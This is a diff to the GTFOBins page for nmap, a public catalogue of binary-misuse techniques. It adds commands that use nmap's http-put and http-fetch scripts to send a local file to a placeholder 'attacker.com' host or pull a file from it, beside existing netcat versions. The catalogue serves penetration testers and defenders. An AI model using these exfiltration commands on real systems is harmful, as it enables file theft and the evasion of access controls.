diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md index 0d24a00..49ae529 100644 --- a/_gtfobins/nmap.md +++ b/_gtfobins/nmap.md @@ -39,6 +39,12 @@ functions: end;c:close();f:close();' > $TF nmap --script=$TF file-upload: + - description: Send a file to a TCP port. Run `socat -v tcp-listen:8080,reuseaddr,fork - on the attacker box to collect the file or use a proper HTTP server. Note that multiple connections are made to the server. Also, it is important that the port is a commonly used HTTP like 80 or 8080. + code: | + RHOST=attacker.com + RPORT=8080 + LFILE=file_to_send + nmap -p $RPORT $RHOST --script http-put --script-args http-put.url=/,http-put.file=$LFILE - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. code: | export RHOST=attacker.com @@ -55,6 +61,13 @@ functions: t:close();' > $TF nmap --script=$TF file-download: + - description: Fetch remote file sent to a local TCP port. Run a proper HTTP server on the attacker box to send the file, e.g., `php -S 0.0.0.0:8080`. Note that multiple connections are made to the server and the result is placed in `$TF/IP/PORT/PATH`. Also, it is important that the port is a commonly used HTTP like 80 or 8080. + code: | + RHOST=attacker.com + RPORT=8080 + TF=$(mktemp -d) + LFILE=file_to_save + nmap -p $RPORT $RHOST --script http-fetch --script-args http-fetch.destination=$TF,http-fetch.url=$LFILE - description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. code: | export LPORT=12345